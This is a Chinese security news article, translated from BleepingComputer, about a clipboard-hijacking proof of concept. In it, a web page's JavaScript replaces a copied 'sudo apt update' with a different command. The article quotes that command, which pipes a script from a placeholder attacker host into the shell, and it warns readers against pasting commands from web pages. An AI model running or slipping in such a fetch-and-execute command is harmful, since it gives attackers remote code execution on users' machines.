聚焦源代码安全,网罗国内外最新资讯!

编译:代码卫士

程序员、系统管理员、安全研究员和技术爱好者门,从网页将命令复制粘贴到控制台或终端可能会导致系统遭攻陷。

安全意识培训平台 Wizer 的创始人 Gabriel Friedlander 最近展示了一个简单但令人惊讶的hack 技术,可能会让所有人从网页复制粘贴命令时三思。

很多人会从网页如 StackOverflow 等复制常用命令并粘贴到应用程序、Windows 命令提示符或Linux 终端。但 Friedlander 提醒称网页可能会秘密取代剪贴板上的内容,用户最终可能会复制恶意内容。更糟糕的是,没有必要的尽职调查,开发人员可能会在粘贴文本之后才会发现错误,但为时已晚。

Friedlander 在博客文章中发布简单的 PoC,请读者复制一个多数系统管理员和开发人员都熟悉的简单命令:

sudo apt update

接下来,将他提供的命令粘贴到文本或 Notepad 中,结果可能会让你大惊失色:

curl http://attacker-domain:8000/shell.sh | sh

用户不仅在剪贴板上粘贴了一个完全不同的命令,而且更糟糕的是,结尾还有一个新行(或return)字符。

这说明,只要将上面的实例直接粘贴到 Linux 中断,它就会立即执行。这和用户的想法大相径庭。

原因是什么?

原因在于 Friedlander 设置的 PoC HTML 页面背后隐藏的 JavaScript 代码中。只要复制HTML 元素中包含的 “sudo apt update” 文本,下面所示的代码片段就会运行。之后,JavaScript的“事件监听”会捕获复制事件并用Friedlander 的恶意测试代码取代剪贴板上的数据。

需要注意的是,事件监听器具有多个 JavaScrip 合法用例,但本案例只是它们可被滥用的例子之一。

Friedlander 提醒称,“这就是为何永远不要直接将命令直接复制粘贴到中断的原因所在。”他表示用户复制粘贴的可能是恶意代码,攻击者只需将一行代码注入所复制的代码中,就可创建后门。他指出,“攻击虽然非常简单但危害非常大”。

这是一个简单但非常重要的日常安全经验教训。

推荐阅读

总是忍不住复制粘贴开源代码会被炒吗?在线等,挺急的

还在复制粘贴密币地址?小心财产不翼而飞啊

谷歌搜索隐私漏洞:复制粘贴搜索结果URL会泄露此前搜索行为

原文链接

https://www.bleepingcomputer.com/news/security/dont-copy-paste-commands-from-webpages-you-can-get-hacked/

题图:Pixabay License

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

 觉得不错,就点个 “在看” 或 "赞” 吧~

千万别从网页复制粘贴命令相关推荐

  1. vi/vim的选中/复制/粘贴命令

    原文: https://www.cnblogs.com/GlassHour/p/5503973.html GlassHour vi/vim的选中/复制/粘贴命令 选自http://blog.csdn. ...

  2. 如何去掉/消除网页复制粘贴后带到word或WPS文档中的浅灰色背景

    如何去掉/消除网页复制粘贴后带到word或WPS文档中的浅灰色背景 从网页或者其它地方复制过来的文字,有时候背景会呈浅灰色,但并非是"突出显示"或是设置了背景颜色,只有有文字的地方 ...

  3. (只需挨个复制粘贴命令即可部署)在Centos7下搭建文件服务器(VSFTPD)

    观看北京尚学堂-百战程序员笔记 一.VSFTPD简介 Linux的组件(一款软件),安装到Linux后可以通过java代码(FtpClient)实现文件的上传.基于FTP协议. 由于VSFTPD是基于 ...

  4. gvim 命令行粘贴_vi/vim复制粘贴命令

    1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下: y      在使用v模式选定了某一块的时候,复制选定块到缓冲区用: yy    ...

  5. Linux系统之复制粘贴命令

    Linux下复制粘贴快捷键 在控制台下:  鼠标选中要复制的文本,按鼠标中键,即为复制  复制命令:Ctrl + Insert  组合键 或 用鼠标选中即是复制.  粘贴命令:Shift + Inse ...

  6. vi/vim中复制粘贴命令

    1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下:      y      在使用v模式选定了某一块的时候,复制选定块到缓冲区用:  ...

  7. linux vim yny复制粘贴,vi/vim复制粘贴命令

    1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下: y      在使用v模式选定了某一块的时候,复制选定块到缓冲区用: yy    ...

  8. vi/vim复制粘贴命令

    1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下:     y      在使用v模式选定了某一块的时候,复制选定块到缓冲区用:   ...

  9. (一)Linux中vi的复制粘贴命令

    vi编辑器有3种模式:命令模式.输入模式.末行模式.掌握这三种模式十分重要: 命令模式:vi启动后默认进入的是命令模式,从这个模式使用命令可以切换到另外两种模式,同时无论在任何模式下只要按一下[Esc ...

最新文章

  1. python零基础电子书免费下载-零基础学Python
  2. 什么是ATM(异步传输模式)?—Vecloud微云
  3. Spring基于注解的AOP配置
  4. SUSE Linux维护笔记三
  5. 目标检测系列(八)——CenterNet:Objects as points
  6. 三星笔记本进入BIOS后找不到U盘启动项/快速启动键F12没有反应
  7. 帝国CMS后台getshell
  8. Top Down Operator Precedence - 自顶向下算符优先分析法
  9. windows server 2003安装pc套件ovi套件全过程?
  10. JS,CSS是前端,JAVA PHP ASP是后端,数据库是后端的处理对象,非代表前后底
  11. 【Django BUG 已解决】You must either define the environment variable DJANGO_SETTINGS_MODULE or call ...
  12. C++模板偏特化和全特化
  13. 启动进程失败,端口被占用处理方法!
  14. 在群晖 DSM 7.0 系统上如何安装 Plex Media Server
  15. (二)计算机取证-案件确认书及证据表
  16. 比赛之前的最后一点点总结
  17. 网易我的世界服务器怎么显示键盘,网易我的世界指令怎么用(常见的指令及使用方式)...
  18. 淘宝 Android 端图片体验优化实践
  19. 【MySQL】修改配置后,重启MySQL报错[ERROR] The server quit without updating PID file
  20. 利用加速度求解位置的算法——三轴传感器

热门文章

  1. iOS之 开发学习笔记-block
  2. CI中写原生SQL(封装查询)
  3. 软件包的安装(源码安装)
  4. 图像处理之调整亮度与饱和度
  5. Sonar - 部署常见问题及解决方法
  6. python安装pymssql等包时出现microsoft visual c++ 14.0 is required问题无需下载visualcppbuildtools的解决办法...
  7. 《数据库系统概念》20-恢复系统
  8. 鼠标悬浮标签显示提示内容
  9. Spyder突然提示打开kernel时发生错误
  10. Nagios各组件简述及nrpe详解